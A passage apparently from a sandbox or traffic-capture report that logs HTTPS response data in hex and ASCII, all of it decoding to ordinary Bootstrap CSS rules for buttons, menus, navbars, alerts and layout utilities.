                                                                                                                                                                                Data Ascii: not(.disabled).active:focus,.btn-outline-light:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-light.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(248,249,250,.5)}.btn-outline-dark{color:#343a40;background-color:transparent;background-im
                                                                                                                                                                                2021-10-25 16:17:23 UTC141INData Raw: 69 67 68 74 3a 31 2e 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 72 65 6d 7d 2e 62 74 6e 2d 67 72 6f 75 70 2d 73 6d 3e 2e 62 74 6e 2c 2e 62 74 6e 2d 73 6d 7b 70 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 20 2e 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 2e 62 74 6e 2d 62 6c 6f 63 6b 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 62 74 6e 2d 62 6c 6f 63 6b 2b 2e 62 74 6e 2d 62 6c 6f 63 6b 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 72 65 6d 7d 69 6e 70 75 74 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2e 62 74 6e 2d 62 6c 6f 63 6b 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 2e 62 74
                                                                                                                                                                                Data Ascii: ight:1.5;border-radius:.3rem}.btn-group-sm>.btn,.btn-sm{padding:.25rem .5rem;font-size:.875rem;line-height:1.5;border-radius:.2rem}.btn-block{display:block;width:100%}.btn-block+.btn-block{margin-top:.5rem}input[type=button].btn-block,input[type=reset].bt
                                                                                                                                                                                2021-10-25 16:17:23 UTC142INData Raw: 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 30 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 2e 33 65 6d 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 2e 33 65 6d 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 33 65 6d 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 64 72 6f 70 75 70 20 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 65 6d 70 74 79 3a 3a 61 66 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 64 72 6f 70 72 69 67 68 74 20 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 31 32 35 72 65 6d 7d 2e 64 72 6f 70 72 69 67 68 74 20 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 3a 61 66 74 65 72
                                                                                                                                                                                Data Ascii: ;border-top:0;border-right:.3em solid transparent;border-bottom:.3em solid;border-left:.3em solid transparent}.dropup .dropdown-toggle:empty::after{margin-left:0}.dropright .dropdown-menu{margin-top:0;margin-left:.125rem}.dropright .dropdown-toggle::after
                                                                                                                                                                                2021-10-25 16:17:23 UTC144INData Raw: 7d 2e 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 3a 66 6f 63 75 73 2c 2e 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 31 38 31 62 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 39 66 61 7d 2e 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 2e 61 63 74 69 76 65 2c 2e 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 3a 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 2e 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 2e 64 69 73 61 62 6c 65 64 2c 2e 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 3a 64 69 73 61 62 6c 65 64 7b 63 6f 6c
                                                                                                                                                                                Data Ascii: }.dropdown-item:focus,.dropdown-item:hover{color:#16181b;text-decoration:none;background-color:#f8f9fa}.dropdown-item.active,.dropdown-item:active{color:#fff;text-decoration:none;background-color:#007bff}.dropdown-item.disabled,.dropdown-item:disabled{col
                                                                                                                                                                                2021-10-25 16:17:23 UTC145INData Raw: 65 78 2d 73 74 61 72 74 7d 2e 62 74 6e 2d 74 6f 6f 6c 62 61 72 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 7b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 62 74 6e 2d 67 72 6f 75 70 3e 2e 62 74 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 62 74 6e 2d 67 72 6f 75 70 3e 2e 62 74 6e 2d 67 72 6f 75 70 3a 6e 6f 74 28 3a 6c 61 73 74 2d 63 68 69 6c 64 29 3e 2e 62 74 6e 2c 2e 62 74 6e 2d 67 72 6f 75 70 3e 2e 62 74 6e 3a 6e 6f 74 28 3a 6c 61 73 74 2d 63 68 69 6c 64 29 3a 6e 6f 74 28 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 29 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 7d 2e 62 74 6e 2d 67 72 6f 75 70 3e 2e 62
                                                                                                                                                                                Data Ascii: ex-start}.btn-toolbar .input-group{width:auto}.btn-group>.btn:first-child{margin-left:0}.btn-group>.btn-group:not(:last-child)>.btn,.btn-group>.btn:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.b
                                                                                                                                                                                2021-10-25 16:17:23 UTC149INData Raw: 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 72 65 6d 20 2e 37 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 63 6f 6c 6f 72 3a 23 34 39 35 30 35 37 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 39 65 63 65 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 65 64 34 64 61 3b 62 6f 72 64 65 72 2d 72 61
                                                                                                                                                                                Data Ascii: -box-align:center;-ms-flex-align:center;align-items:center;padding:.375rem .75rem;margin-bottom:0;font-size:1rem;font-weight:400;line-height:1.5;color:#495057;text-align:center;white-space:nowrap;background-color:#e9ecef;border:1px solid #ced4da;border-ra
                                                                                                                                                                                2021-10-25 16:17:23 UTC153INData Raw: 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 34 20 35 27 25 33 45 25 33 43 70 61 74 68 20 66 69 6c 6c 3d 27 25 32 33 33 34 33 61 34 30 27 20 64 3d 27 4d 32 20 30 4c 30 20 32 68 34 7a 6d 30 20 35 4c 30 20 33 68 34 7a 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 29 20 6e 6f 2d 72 65 70 65 61 74 20 72 69 67 68 74 20 2e 37 35 72 65 6d 20 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 38 70 78 20 31 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 65 64 34 64 61 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 61 70 70 65
                                                                                                                                                                                Data Ascii: lns='http://www.w3.org/2000/svg' viewBox='0 0 4 5'%3E%3Cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3E%3C/svg%3E") no-repeat right .75rem center;background-size:8px 10px;border:1px solid #ced4da;border-radius:.25rem;-webkit-appearance:none;-moz-appe
                                                                                                                                                                                2021-10-25 16:17:23 UTC154INData Raw: 38 30 30 30 0d 0a 3b 7a 2d 69 6e 64 65 78 3a 32 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 32 2e 32 35 72 65 6d 20 2b 20 32 70 78 29 3b 6d 61 72 67 69 6e 3a 30 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 69 6e 70 75 74 3a 66 6f 63 75 73 7e 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 63 6f 6e 74 72 6f 6c 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 30 62 64 66 66 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 30 2c 31 32 33 2c 32 35 35 2c 2e 32 35 29 7d 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 69 6e 70 75 74 3a 66 6f 63 75 73 7e 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 63 6f 6e 74 72 6f 6c 3a 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 30 62
                                                                                                                                                                                Data Ascii: 8000;z-index:2;width:100%;height:calc(2.25rem + 2px);margin:0;opacity:0}.custom-file-input:focus~.custom-file-control{border-color:#80bdff;box-shadow:0 0 0 .2rem rgba(0,123,255,.25)}.custom-file-input:focus~.custom-file-control::before{border-color:#80b
                                                                                                                                                                                2021-10-25 16:17:23 UTC158INData Raw: 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 73 6d 20 2e 6e 61 76 62 61 72 2d 6e 61 76 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 73 6d 20 2e 6e 61 76 62 61 72 2d 6e 61 76 20 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 73 6d 20 2e 6e 61 76 62 61 72 2d 6e 61 76 20 2e 64 72 6f 70 64 6f 77 6e
                                                                                                                                                                                Data Ascii: fy-content:flex-start}.navbar-expand-sm .navbar-nav{-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.navbar-expand-sm .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-sm .navbar-nav .dropdown
                                                                                                                                                                                2021-10-25 16:17:23 UTC162INData Raw: 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 6e 61 76 20 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 6e 61 76 20 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 2d 72 69 67 68 74 7b 72 69 67 68 74 3a 30 3b 6c 65 66 74 3a 61 75 74 6f 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 6e 61 76 20 2e 6e 61 76 2d 6c
                                                                                                                                                                                Data Ascii: it-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.navbar-expand .navbar-nav .dropdown-menu{position:absolute}.navbar-expand .navbar-nav .dropdown-menu-right{right:0;left:auto}.navbar-expand .navbar-nav .nav-l
                                                                                                                                                                                2021-10-25 16:17:23 UTC167INData Raw: 72 2d 74 61 62 73 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 2e 36 32 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 2e 37 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 2e 36 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 63 61 72 64 2d 68 65 61 64 65 72 2d 70 69 6c 6c 73 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 2e 36 32 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 2e 36 32 35 72 65 6d 7d 2e 63 61 72 64 2d 69 6d 67 2d 6f 76 65 72 6c 61 79 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 3a 31 2e 32 35 72 65 6d 7d 2e 63 61 72 64 2d 69 6d 67 7b 77 69 64 74 68 3a 31 30 30 25 3b 62 6f
                                                                                                                                                                                Data Ascii: r-tabs{margin-right:-.625rem;margin-bottom:-.75rem;margin-left:-.625rem;border-bottom:0}.card-header-pills{margin-right:-.625rem;margin-left:-.625rem}.card-img-overlay{position:absolute;top:0;right:0;bottom:0;left:0;padding:1.25rem}.card-img{width:100%;bo
                                                                                                                                                                                2021-10-25 16:17:23 UTC171INData Raw: 78 3a 32 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 30 2c 31 32 33 2c 32 35 35 2c 2e 32 35 29 7d 2e 70 61 67 65 2d 6c 69 6e 6b 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 70 61 67 65 2d 69 74 65 6d 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 2e 70 61 67 65 2d 6c 69 6e 6b 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 7d 2e 70 61 67 65 2d 69 74 65 6d 3a 6c 61 73 74 2d 63 68 69 6c 64 20 2e 70 61 67 65 2d 6c 69 6e
                                                                                                                                                                                Data Ascii: x:2;outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,.25)}.page-link:not(:disabled):not(.disabled){cursor:pointer}.page-item:first-child .page-link{margin-left:0;border-top-left-radius:.25rem;border-bottom-left-radius:.25rem}.page-item:last-child .page-lin
                                                                                                                                                                                2021-10-25 16:17:23 UTC175INData Raw: 32 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 65 66 65 66 65 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 64 66 64 66 65 7d 2e 61 6c 65 72 74 2d 6c 69 67 68 74 20 68 72 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 65 63 65 63 66 36 7d 2e 61 6c 65 72 74 2d 6c 69 67 68 74 20 2e 61 6c 65 72 74 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 36 38 36 38 36 38 7d 2e 61 6c 65 72 74 2d 64 61 72 6b 7b 63 6f 6c 6f 72 3a 23 31 62 31 65 32 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 36 64 38 64 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 36 63 38 63 61 7d 2e 61 6c 65 72 74 2d 64 61 72 6b 20 68 72 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 62 39 62 62 62 65 7d 2e 61 6c 65 72 74 2d 64 61 72 6b 20 2e 61 6c
                                                                                                                                                                                Data Ascii: 2;background-color:#fefefe;border-color:#fdfdfe}.alert-light hr{border-top-color:#ececf6}.alert-light .alert-link{color:#686868}.alert-dark{color:#1b1e21;background-color:#d6d8d9;border-color:#c6c8ca}.alert-dark hr{border-top-color:#b9bbbe}.alert-dark .al
                                                                                                                                                                                2021-10-25 16:17:23 UTC179INData Raw: 6f 72 3a 23 38 35 36 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 65 38 61 31 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 77 61 72 6e 69 6e 67 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 61 63 74 69 6f 6e 2e 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 35 36 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 35 36 34 30 34 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 64 61 6e 67 65 72 7b 63 6f 6c 6f 72 3a 23 37 32 31 63 32 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 63 36 63 62 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 64 61 6e 67 65 72 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 61 63 74 69
                                                                                                                                                                                Data Ascii: or:#856404;background-color:#ffe8a1}.list-group-item-warning.list-group-item-action.active{color:#fff;background-color:#856404;border-color:#856404}.list-group-item-danger{color:#721c24;background-color:#f5c6cb}.list-group-item-danger.list-group-item-acti
                                                                                                                                                                                2021-10-25 16:17:23 UTC183INData Raw: 72 64 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 62 72 65 61 6b 3a 61 75 74 6f 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 72 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 74 6f 6f 6c 74 69 70 2e 73 68 6f 77 7b 6f 70 61 63 69 74 79 3a 2e 39 7d 2e 74 6f 6f 6c 74 69 70 20 2e 61 72 72 6f 77 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 2e 38 72 65 6d 3b 68 65 69 67 68 74 3a 2e 34 72 65 6d 7d 2e 74 6f 6f 6c 74 69 70 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 62 6f
                                                                                                                                                                                Data Ascii: rd-spacing:normal;white-space:normal;line-break:auto;font-size:.875rem;word-wrap:break-word;opacity:0}.tooltip.show{opacity:.9}.tooltip .arrow{position:absolute;display:block;width:.8rem;height:.4rem}.tooltip .arrow::before{position:absolute;content:"";bo
                                                                                                                                                                                2021-10-25 16:17:23 UTC186INData Raw: 38 30 30 30 0d 0a 77 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 7b 6c 65 66 74 3a 63 61 6c 63 28 28 2e 35 72 65 6d 20 2b 20 31 70 78 29 20 2a 20 2d 31 29 3b 77 69 64 74 68 3a 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 72 65 6d 3b 6d 61 72 67 69 6e 3a 2e 33 72 65 6d 20 30 7d 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 3a 3a 61 66 74 65 72 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 3a 3a 61 66 74 65 72 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 72 69 67 68 74 20
                                                                                                                                                                                Data Ascii: 8000w,.bs-popover-right .arrow{left:calc((.5rem + 1px) * -1);width:.5rem;height:1rem;margin:.3rem 0}.bs-popover-auto[x-placement^=right] .arrow::after,.bs-popover-auto[x-placement^=right] .arrow::before,.bs-popover-right .arrow::after,.bs-popover-right
                                                                                                                                                                                2021-10-25 16:17:23 UTC190INData Raw: 65 72 3b 6f 70 61 63 69 74 79 3a 2e 35 7d 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 6e 65 78 74 3a 66 6f 63 75 73 2c 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 6e 65 78 74 3a 68 6f 76 65 72 2c 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 70 72 65 76 3a 66 6f 63 75 73 2c 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 70 72 65 76 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 30 3b 6f 70 61 63 69 74 79 3a 2e 39 7d 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 70 72 65 76 7b 6c 65 66 74 3a 30 7d 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 6e 65 78 74 7b 72 69 67 68 74 3a 30 7d 2e 63 61 72 6f 75 73 65 6c 2d 63
                                                                                                                                                                                Data Ascii: er;opacity:.5}.carousel-control-next:focus,.carousel-control-next:hover,.carousel-control-prev:focus,.carousel-control-prev:hover{color:#fff;text-decoration:none;outline:0;opacity:.9}.carousel-control-prev{left:0}.carousel-control-next{right:0}.carousel-c
                                                                                                                                                                                2021-10-25 16:17:23 UTC194INData Raw: 67 68 74 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 38 66 39 66 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6f 72 64 65 72 2d 64 61 72 6b 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 33 34 33 61 34 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 6f 72 64 65 72 2d 77 68 69 74 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 6f 75 6e 64 65 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 72 6f 75 6e 64 65 64 2d 74 6f 70 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d
                                                                                                                                                                                Data Ascii: ght{border-color:#f8f9fa!important}.border-dark{border-color:#343a40!important}.border-white{border-color:#fff!important}.rounded{border-radius:.25rem!important}.rounded-top{border-top-left-radius:.25rem!important;border-top-right-radius:.25rem!important}
                                                                                                                                                                                2021-10-25 16:17:23 UTC199INData Raw: 2d 31 36 62 79 39 3a 3a 62 65 66 6f 72 65 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 36 2e 32 35 25 7d 2e 65 6d 62 65 64 2d 72 65 73 70 6f 6e 73 69 76 65 2d 34 62 79 33 3a 3a 62 65 66 6f 72 65 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 37 35 25 7d 2e 65 6d 62 65 64 2d 72 65 73 70 6f 6e 73 69 76 65 2d 31 62 79 31 3a 3a 62 65 66 6f 72 65 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 30 25 7d 2e 66 6c 65 78 2d 72 6f 77 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6c 65 78
                                                                                                                                                                                Data Ascii: -16by9::before{padding-top:56.25%}.embed-responsive-4by3::before{padding-top:75%}.embed-responsive-1by1::before{padding-top:100%}.flex-row{-webkit-box-orient:horizontal!important;-webkit-box-direction:normal!important;-ms-flex-direction:row!important;flex
                                                                                                                                                                                2021-10-25 16:17:23 UTC203INData Raw: 2d 62 6f 78 2d 70 61 63 6b 3a 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 73 6d 2d 65 6e 64 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 73 6d 2d 63 65 6e 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a
                                                                                                                                                                                Data Ascii: -box-pack:start!important;-ms-flex-pack:start!important;justify-content:flex-start!important}.justify-content-sm-end{-webkit-box-pack:end!important;-ms-flex-pack:end!important;justify-content:flex-end!important}.justify-content-sm-center{-webkit-box-pack:
